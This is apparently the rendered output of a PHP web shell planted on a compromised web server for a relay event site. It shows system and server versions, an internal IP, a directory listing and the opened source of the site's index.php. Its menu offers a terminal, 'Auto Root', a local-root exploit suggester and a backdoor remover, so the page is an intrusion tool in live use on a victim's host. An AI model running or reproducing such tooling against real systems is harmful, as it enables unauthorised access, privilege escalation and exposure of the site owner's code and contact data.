Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
relay /
images /
Delete
Unzip
Name
Size
Permission
Date
Action
2007
[ DIR ]
drwxrwsr-x
2014-07-04 12:15
2008
[ DIR ]
drwxrwsr-x
2014-07-04 12:15
2010
[ DIR ]
drwxrwsr-x
2014-07-07 07:10
2011
[ DIR ]
drwxrwsr-x
2014-07-07 07:42
2012
[ DIR ]
drwxrwsr-x
2014-07-07 08:53
cycle
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
prize 2007
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
prize 2008
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
prize2007
[ DIR ]
drwxrwsr-x
2014-07-04 12:15
prize2008
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
relay 2007
[ DIR ]
drwxrwsr-x
2014-07-04 12:15
relay 2008
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
relay2007
[ DIR ]
drwxrwsr-x
2014-07-04 12:15
relay2008
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
right
[ DIR ]
drwxrwsr-x
2018-07-19 09:04
run
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
walk
[ DIR ]
drwxrwsr-x
2014-07-07 08:58
CESA-Relay-Emailer2.jpg
115.69
KB
-rw-rw-r--
2018-07-02 09:42
CESA-Relay-Participants.jpg
121.3
KB
-rw-rw-r--
2018-09-12 11:11
CESA_Relay_Map.jpg
130.48
KB
-rw-rw-r--
2014-07-23 11:14
Johannesburg.jpg
27.92
KB
-rw-rw-r--
2014-08-19 08:36
Pretoria.jpg
97.69
KB
-rw-rw-r--
2014-08-19 08:36
SSIWebFront.jpg
0
B
-rw-rw-r--
2014-07-04 12:15
_SSIWebFront.jpg
0
B
-rw-rw-r--
2014-07-04 12:15
bullet.gif
49
B
-rw-rw-r--
2014-07-04 12:15
close.gif
222
B
-rw-rw-r--
2014-07-04 12:15
closelabel.gif
979
B
-rw-rw-r--
2014-07-04 12:15
download-icon.gif
1.12
KB
-rw-rw-r--
2014-07-04 12:15
eagle.png
124.24
KB
-rw-rw-r--
2014-07-23 11:14
eaglewaters.jpg
0
B
-rw-rw-r--
2014-07-04 12:15
eaglewaters1.jpg
0
B
-rw-rw-r--
2014-07-04 12:15
error_log
17.43
KB
-rw-rw-r--
2014-07-04 12:15
index.php
5.07
KB
-rw-rw-r--
2015-06-23 07:53
load.gif
721
B
-rw-rw-r--
2014-07-04 12:15
loading.gif
2.7
KB
-rw-rw-r--
2014-07-04 12:15
logo.png
21.17
KB
-rw-rw-r--
2018-06-06 07:55
mailerheader.jpg
116.12
KB
-rw-rw-r--
2016-06-22 09:15
mailerheader2.jpg
91.02
KB
-rw-rw-r--
2016-08-24 08:35
nextlabel.gif
1.22
KB
-rw-rw-r--
2014-07-04 12:15
nyeleti.jpg
18.25
KB
-rw-rw-r--
2015-06-08 07:55
prevlabel.gif
1.23
KB
-rw-rw-r--
2014-07-04 12:15
savethedate2019.jpg
241.91
KB
-rw-rw-r--
2019-06-12 10:02
ssi_logo.jpg
192.71
KB
-rw-rw-r--
2014-07-04 12:15
topmed_top_banner.gif
38.96
KB
-rw-rw-r--
2014-07-04 12:15
Save
Rename
<?php session_start(); $pagename='index.php'; $admin_email='cesarelay@cesa.co.za';//'SSISAACERelay@ssi.co.za'; //$admin_email='johnathan@terranova.co.za';//'SSISAACERelay@ssi.co.za'; if (isset($_GET['sec'])&&$_GET['sec']=='lout'&&!isset($_POST['log_sub'])) { if (isset($_SESSION['uid'])) unset($_SESSION['uid']); if (isset($_SESSION['unid'])) unset($_SESSION['unid']); if (isset($_SESSION['aid'])) unset($_SESSION['aid']); if (isset($_SESSION['said'])) unset($_SESSION['said']); if (isset ($_SESSION['count'])) session_destroy(); } require('include/db.php'); require('include/sec.php'); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <script type="text/javascript"> function validate_required(field,alerttxt) { with (field) { if (value==null||value=="") { alert(alerttxt);return false; } else { return true; } } } function validate_form(thisform) { with (thisform) { if (validate_required(ID_num1,"Please fill out this field, or select the passport option, by clicking below.")==false) {ID_num1.value=("Passport");return false;} if (validate_required(ID_num,"Please fill out this field, or select the passport option, by clicking below.")==false) {ID_num.focus();return false;} if (validate_required(name,"Please fill out your name.")==false) {name.focus();return false;} } } </script> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>CESA Relay 2011</title> <link href="screen.css" rel="stylesheet" type="text/css" /> <style type="text/css"> <!-- .style1 {color:#999;} .style2 {color: #999; } --> </style> <style type="text/css"> div.panel,p.flip { margin:0px; padding:5px; text-align:left; background:#999; border:solid 1px #999; } div.panel { height:50px; display:none; } </style> </head> <body> <table width="900" height="100%" border="0" align="left" cellpadding="0" cellspacing="0"> <tr> <td width="231" align="left" class="left" valign="top"> <div align="center"><a href="http://www.cesa.co.za" target="_blank"><br /> <img src="img/cesaLogo.gif" width="201" height="70" border="0" /><br /> <br /> </a><br /> </P> </div> <?php require('include/menu.php'); ?> </div> <p align="center"><strong><br /> Proudly Hosted By: </strong> </p> <p align="center"> <a href="http://www.ssi-dhv.com"><img src="img/ssilogo.gif" width="160" height="66" border="0" /></a> <br /> <br /> <strong>Sponsors</strong>: </p> <div align="center"> <table id="Table5" cellspacing="0" cellpadding="0" width="140" border="0"> <tr> <td style="HEIGHT: 29px" colspan="3"><img src="img/sponsor.png" width="167" border="0" usemap="#Map2"/> <map name="Map2" id="Map2"> <area shape="rect" coords="17,24,156,75" href="http://www.topmed.co.za/" target="_blank" /> <area shape="rect" coords="23,89,138,147" href="http://www.pbcgroup.co.za/" target="_blank" /> <area shape="rect" coords="38,198,121,285" href="http://www.3smedia.co.za/" target="_blank" /> <!--area shape="rect" coords="20,479,148,544" href="http://www.golder.com" /> <area shape="rect" coords="21,557,146,596" href="http://www.absa.co.za" /--> <area shape="rect" coords="16,342,152,395" href="http://www.sasfin.com/" target="_blank" /> </map></td> </tr> </table> </div> <p align="center"></p></td> <td width="669" valign="top" class="contentBG"><table width="98%" border="0" cellspacing="0" cellpadding="0" align="right"> <tr> <td width="55%"><h1 class="style2" style="padding-left:10px;">SSI 2011 CESA RELAY </h1></td> <td width="45%"><img src="img/logo.png" width="239" height="151" /></td> </tr> <tr> <td colspan="2" class="content"><?php require('include/con_area.php');?></td> </tr> <tr> <td colspan="2" class="content"> </td> </tr> <tr> <td colspan="2" class="content"><?php require('include/footer.php'); ?></td> </tr> </table> <p align="center"><img src="images/topmed_top_banner.gif" /></p></td> </tr> </table> <script type="text/javascript" src="js/jquery-1.4.2.min.js"></script> <script type="text/javascript"> $(document).ready(function(){ $(".flip").click(function(){ $(".panel").slideToggle("slow"); }); }); </script> <map name="Map" id="Map"><area shape="rect" coords="30,20,138,79" href="http://www.absa.co.za" /><area shape="rect" coords="32,106,131,150" href="http://www.bepmeds.co.za" /><area shape="rect" coords="36,182,127,231" href="#" /><area shape="rect" coords="36,254,126,299" href="http://www.sasfin.co.za" /><area shape="rect" coords="35,320,126,375" href="http"//www.sovhealth.co.za" /><area shape="rect" coords="13,420,150,517" href="http://mmsa.momentum.co.za/mmsa/fundindex.jsp?fundName=bepmeds" /></map> </body> </html>